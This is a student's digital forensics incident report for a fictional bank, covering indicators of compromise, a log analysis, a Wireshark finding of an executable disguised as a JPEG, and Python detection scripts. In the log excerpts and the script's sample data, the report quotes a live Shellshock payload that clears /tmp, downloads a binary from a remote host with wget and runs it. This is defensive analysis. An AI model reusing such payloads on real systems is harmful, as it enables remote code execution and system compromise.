Blumenstein_E_CST610_Project_3 (1) (2) (docx)
School: University of Maryland
Course: 610
Subject: Information Systems
Date: Jan 9, 2024
Pages: 14
Uploaded by afeeblemind
CST 610 Project 3
Cyberspace and Cybersecurity Foundations
Security Event and Incident Report
Prepared By: Elliott Blumenstein
Version 1.0

Table of Contents
Introduction
Objectives
Definitions
Predictions
Reflections
Introduction
This report documents and analyzes the incident/event, the response taken, and the prevention of future incidents/events. We will provide details of the incident in FICBank’s infrastructure: when and how it was detected, the possible impact, and the actions taken to remedy the issue. The goals are to give the company an idea of what we want out of this investigation and to give an account of our findings. To avoid confusion in this report, definitions of certain words and phrases are listed; they clarify some details and provide a better understanding of what is being reported. FICBank is a small company and cannot always have IT professionals on the ground monitoring. We predict that there will be different indicators of compromise, and we name the tools that will be most useful to identify the cause and the outcomes of using those tools. The company will be given details of the incident(s) found using these tools and techniques. We will provide screenshots of each incident we find along with its details. Lastly, we will summarize the report, from the tools we used to our approach to identifying the incidents. The challenges we faced during this process will give us an idea of what can be done in the future. This report will be the starting point for FICBank in its endeavor to protect its infrastructure from outside threats.

Objectives
This report aims to identify Indicators of Compromise and investigate them using forensic tools, techniques, and practices. The report will provide detailed findings once we analyze the Access_2 log file and the CST610Project2Wireshark pcap file.

Definitions
“Indicators of Compromise are defined as forensic artifacts that can be used as signs to denote a system has been compromised by an attack or was otherwise infected by malicious software” (Catakoglu et al., 2016, p. 3, para. 1). “The root Cause Analysis (RCA) is a structured investigation that aims to identify the real cause of a problem and the actions necessary to eliminate it” (Wagen, 2017, p. 1).

Predictions
Usually a successful login takes only a few tries, so many login attempts from one source could indicate that a bad actor is trying to access the system. A lockout should occur after repeated failed attempts; if one is not in place, it should be implemented as part of the solution. Another indicator is unusual outbound network traffic. “If the outbound traffic within the ICS network increases significantly or is not in the typical model, there could be malicious activity” (Asiri et al., 2023). Such an increase alerts us that something is suspicious, and the team will investigate the issue. “A large amount of database reads and queries is a clear indicator that an attacker has penetrated the system” (Asiri et al., 2023). The database is vital in FICBank’s infrastructure, as it stores all data for transactions, searches, customer information, etc. These are just some types of IOCs.

For FICBank to receive the root cause of the reported events, we will need to use specific tools, techniques, and practices to investigate appropriately. Wireshark is one tool we will use to analyze data. Wireshark is a network protocol analyzer, an application that captures packets from a network connection (What is Wireshark and how to use it: Cybersecurity: CompTIA). We will use Wireshark to analyze the log files and see if there are any anomalies. If there are any events, the program can trace the connections to where the event came from. This program offers more features and will likely provide more information about security incidents. Anaconda is a program that allows Python code to be run: we input code and it gives us an output. We could use this program to see how many IP addresses accessed the database, how many HTTP tunneling attempts occurred, and which IP had the most traffic. These are just some of the capabilities this program provides.

There are techniques we will utilize in this investigation. Log analysis is an essential technique. Viewing the log data from the system can show us which IP address has the most traffic, whether there is raw data within the log file, and which network device is involved. Traffic analysis is another technique we will use. We will examine network traffic to identify unusual activities like an influx in traffic, unknown IP addresses in the flow, and unauthorized access to the database. The most important aspect of this is unauthorized access. Unauthorized access could indicate an insider threat at the company or that malicious code was input into the system to allow someone access. Now that we have discussed the tools and techniques we could use, next are our practices. “The root Cause Analysis (RCA) is a structured investigation that aims to identify the real cause of a problem and the actions necessary to eliminate it” (Wagen, 2017). The RCA will be used to uncover the problems, understand them, and eliminate them. We will then analyze how to keep the business safe from other IT infrastructure problems. With the provided tools, techniques, and practices, the expected outcome is to find suspicious network traffic, unauthorized access to the system, and possibly some viruses in the data. FICBank is a small banking company that cannot always have cybersecurity personnel monitoring its systems. I expect that since they have a weak IT infrastructure, a bad actor has exploited this and got into their system. We will determine what has happened and provide FICBank with practices to prevent these issues from occurring again.
Events and Indicators of Compromise Work Products
Figure 1. Nessus Tenable Vulnerability Report. The Nessus reporting tool reports 23 vulnerabilities and a list of some IP addresses. We would need to purchase a license through Nessus to receive a full scan, but at least this gives us a sample of what is in Access-2.log. The pie graph to the right shows the percentage of each vulnerability severity: high vulnerabilities make up only 3%, medium vulnerabilities make up 10%, and info makes up 70%.
Figure 2. High Vulnerability Example in Tenable. The great thing about Nessus is that it provides us with a solution, here rejecting certain queries. This vulnerability has a status of High. The information provided also gives a description of what the vulnerability is.

Figure 3. Graph from Notepad++ showing the amount of activity. Reviewing the Access_2 log file, we see that on October 1st there was an influx of activity; the day before and the days after the influx, activity went down. This could mean that there was unauthorized access to the database. Unauthorized access could mean that malware was introduced. The influx could indicate a hole in the database that allows persons or programs to enter and create code to execute commands.

Figure 4. Line in Access_2 showing successful access to the system and the Shellshock vulnerability. The IP address 61.161.130.241 has malware contained in its log-file line:
() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-ionw
From this portion of the line we see /bin/bash; this is an attempt to exploit the Shellshock vulnerability. This vulnerability allows whoever is accessing the system to execute commands. We also noticed the HTTP status code 200, which indicates that the request succeeded.
Figure 5. Line 2223 in Wireshark. The figure above is from a program called Wireshark. We use Wireshark to do packet-level analysis of a PCAP file from FICBank. The presence of MZ, the signature that begins a Windows executable file, in a response purporting to be image/jpeg is a significant red flag. The header Connection: Keep-Alive means that the connection will be kept open.

Figure 6. Results of analysis using TrIDNet. This file, exported from Wireshark, is identified as an executable. This could mean that the image contains malware and could compromise the system.
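The check behind Figures 5 and 6 (a declared image/jpeg whose body starts with the MZ executable signature) can be automated. The following script is an added example written for this page, not code from the report or from Wireshark or TrIDNet. It assumes a raw HTTP/1.1 response as bytes; the two responses it inspects are constructed in the script, with a PE-style header served as image/jpeg beside a genuine JPEG header, and the hypothetical helper names (sniff_type, check_response, build_response) are mine.

```python
# Known file signatures ("magic bytes") checked against the body of an HTTP response.
MAGIC = [
    (b'MZ', 'application/x-dosexec'),       # DOS/Windows executable (PE) header
    (b'\xff\xd8\xff', 'image/jpeg'),
    (b'\x89PNG\r\n\x1a\n', 'image/png'),
    (b'GIF87a', 'image/gif'),
    (b'GIF89a', 'image/gif'),
]


def sniff_type(body):
    """Return the MIME type implied by the leading bytes, or None if unrecognised."""
    for sig, mime in MAGIC:
        if body.startswith(sig):
            return mime
    return None


def split_response(raw):
    """Split a raw HTTP/1.1 response into (headers dict, body bytes)."""
    head, _, body = raw.partition(b'\r\n\r\n')
    headers = {}
    for line in head.split(b'\r\n')[1:]:       # skip the status line
        name, _, value = line.partition(b':')
        headers[name.strip().lower().decode('ascii')] = value.strip().decode('ascii', 'replace')
    return headers, body


def check_response(raw):
    """Compare the declared Content-Type with what the body's magic bytes say."""
    headers, body = split_response(raw)
    declared = headers.get('content-type', '').split(';')[0].strip().lower()
    sniffed = sniff_type(body)
    return {
        'declared': declared,
        'sniffed': sniffed,
        # A recognised signature that disagrees with the declared type is the red flag.
        'mismatch': sniffed is not None and sniffed != declared,
        'keep_alive': headers.get('connection', '').lower() == 'keep-alive',
    }


def build_response(content_type, body, keep_alive=True):
    """Assemble a minimal HTTP/1.1 200 response (constructed test data, not a capture)."""
    head = (f'HTTP/1.1 200 OK\r\nContent-Type: {content_type}\r\n'
            f'Content-Length: {len(body)}\r\n'
            f'Connection: {"Keep-Alive" if keep_alive else "close"}\r\n\r\n')
    return head.encode('ascii') + body


# Constructed samples: a PE header served as image/jpeg, and a genuine JPEG header.
SUSPECT_RESPONSE = build_response('image/jpeg', b'MZ\x90\x00\x03\x00\x00\x00' + b'\x00' * 56)
BENIGN_RESPONSE = build_response('image/jpeg', b'\xff\xd8\xff\xe0\x00\x10JFIF\x00' + b'\x00' * 54)

if __name__ == '__main__':
    for label, raw in (('suspect', SUSPECT_RESPONSE), ('benign', BENIGN_RESPONSE)):
        r = check_response(raw)
        print(f"{label}: declared={r['declared']} sniffed={r['sniffed']} "
              f"mismatch={r['mismatch']} keep_alive={r['keep_alive']}")
```

On a real capture, the body passed to check_response would be the reassembled HTTP object exported from Wireshark; the signature table only needs the first few bytes, so the check is cheap enough to run over every object in the export.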
61.161.130.241 - - [30/Sep/2015:10:36:01 -0400] "GET / HTTP/1.1" 200 867 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-fiuz >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-fiuz >> /tmp/Run.sh;echo /tmp/China.Z-fiuz >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-fiuz >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-fiuz >> /tmp/Run.sh;echo /tmp/China.Z-fiuz >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22"
This is a line from the Access_2 log file, and it contains malicious commands. As stated before, the portion highlighted in yellow shows that the Shellshock vulnerability was exploited in Bash; this exploit could allow attackers to execute commands on the system. A file downloaded and saved as /tmp/China.Z-fiuz is highlighted in green; we see it numerous times in this line. The /tmp directory was cleared before this file was downloaded and saved as /tmp/China.Z-fiuz. It is worth noting that just because it says China does not mean that this malicious code came from China.
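The Predictions section proposes using Python (via Anaconda) to count which IP addresses appear in the log, which one generates the most traffic, and whether repeated login attempts occur, and the line above shows the Shellshock pattern that such analysis should flag. The script below is an added example for this page, not code from the report. It assumes the Apache combined log format shown in the line above; the sample lines are constructed (the first is shortened from the Access_2 line quoted above, the rest use the 192.0.2.0/24 documentation range), and the helper names (parse_line, is_shellshock, summarize, top_talker) are mine.

```python
import re
from collections import Counter

# Apache "combined" log format. Quoted fields may carry backslash escapes such as
# \x22, which is how Apache writes a literal double quote inside a field.
QUOTED_FIELD = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>' + QUOTED_FIELD + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + QUOTED_FIELD + r')" "(?P<agent>' + QUOTED_FIELD + r')"\s*$'
)

# Shellshock trigger: an empty function body "() { :; };" followed by trailing text
# that a vulnerable Bash executes when it imports the variable.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{\s*:\s*;\s*\}\s*;')

SAMPLE_LOG = [
    # Shortened from the Access_2 line quoted in the report (same IP, date, and pattern).
    r'61.161.130.241 - - [30/Sep/2015:10:36:01 -0400] "GET / HTTP/1.1" 200 867 '
    r'"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.212.172:911/java '
    r'-O /tmp/China.Z-fiuz >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" '
    r'"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;/tmp/Run.sh\x22"',
    # Constructed benign and failed-login traffic (192.0.2.0/24 is a documentation range).
    r'192.0.2.20 - - [30/Sep/2015:11:02:17 -0400] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    r'192.0.2.10 - - [01/Oct/2015:09:15:00 -0400] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'192.0.2.10 - - [01/Oct/2015:09:15:05 -0400] "POST /login HTTP/1.1" 401 231 "http://bank.example/login" "Mozilla/5.0"',
    r'192.0.2.10 - - [01/Oct/2015:09:15:09 -0400] "POST /login HTTP/1.1" 401 231 "http://bank.example/login" "Mozilla/5.0"',
]


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e['status'] = int(e['status'])
    e['day'] = e['ts'].split(':', 1)[0]          # e.g. "30/Sep/2015"
    return e


def is_shellshock(entry):
    """True if the request line, referer, or user agent carries the Shellshock trigger."""
    return any(SHELLSHOCK_RE.search(entry[f]) for f in ('request', 'referer', 'agent'))


def summarize(lines):
    """Count requests per IP and per day, auth failures per IP, and Shellshock attempts."""
    per_ip, per_day, failed_logins = Counter(), Counter(), Counter()
    shellshock, unparsed = [], 0
    for line in lines:
        e = parse_line(line)
        if e is None:
            unparsed += 1                         # keep a tally rather than silently dropping
            continue
        per_ip[e['ip']] += 1
        per_day[e['day']] += 1
        if e['status'] in (401, 403):             # repeated auth failures from one source
            failed_logins[e['ip']] += 1
        if is_shellshock(e):
            shellshock.append((e['ip'], e['day'], e['status']))
    return {'per_ip': per_ip, 'per_day': per_day, 'failed_logins': failed_logins,
            'shellshock': shellshock, 'unparsed': unparsed}


def top_talker(summary):
    """(ip, count) for the source with the most requests."""
    return summary['per_ip'].most_common(1)[0]


if __name__ == '__main__':
    s = summarize(SAMPLE_LOG)
    print('requests per day:', dict(s['per_day']))
    print('top talker:', top_talker(s))
    print('failed logins per IP:', dict(s['failed_logins']))
    for ip, day, status in s['shellshock']:
        print(f'Shellshock attempt from {ip} on {day}; server returned {status}')
```

To run it against the real file, replace SAMPLE_LOG with the lines read from Access_2.log; the per-day counter reproduces the October 1st spike seen in Figure 3, and a Shellshock hit whose status is 200 is the combination the report treats as a successful exploitation attempt.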
Reflection
General:
1. What digital forensic tools did you use during the investigation?
Nessus Tenable, LogViewPlus, Wireshark, Notepad++, and TrIDNet.
2. What was your approach to identifying potential indicators of compromise?
We used a scan to see if there were any vulnerabilities. After that, we investigated those vulnerabilities, like the Shellshock vulnerability. Using LogViewPlus, we saw that activity was high on certain days, and we monitored the network traffic for any unusual activity.
3. How did you verify the credibility of the artifacts from FICBank's employees?
The programs allowed us to see multiple attempts by unauthorized entities to access the system.
4. What challenges did you face during the investigation?
Analyzing the files provided can be delicate and demanding. Also, not having full rights to specific programs hindered some of the investigation.
5. How did you ensure that the investigation met industry standards?
Using guidelines from multiple agencies to the best of our ability, we conducted a sound investigation. Sticking with a structured outline allowed us to investigate as well as possible. Also, by using programs like Wireshark and TrID, we tried to align with industry standards.
References
Asiri, M., Saxena, N., Gjomemo, R., & Burnap, P. (2023). Understanding indicators of compromise against cyber-attacks in industrial control systems: A security perspective. ACM Transactions on Cyber-Physical Systems, 7(2), 1–33. https://doi.org/10.1145/3587255
Catakoglu, O., Balduzzi, M., & Balzarotti, D. (2016). Automatic extraction of indicators of compromise for web applications. Proceedings of the 25th International Conference on World Wide Web, 1–11. https://doi.org/10.1145/2872427.2883056
Wagen, G. (2017). An empirical study of root-cause analysis in information security. ResearchGate. https://www.researchgate.net/publication/319753715_An_Empirical_Study_of_Root-Cause_Analysis_in_Information_Security_Management
What is Wireshark and how to use it: Cybersecurity: CompTIA. (n.d.). CompTIA.org. https://www.comptia.org/content/articles/what-is-wireshark-and-how-to-use-it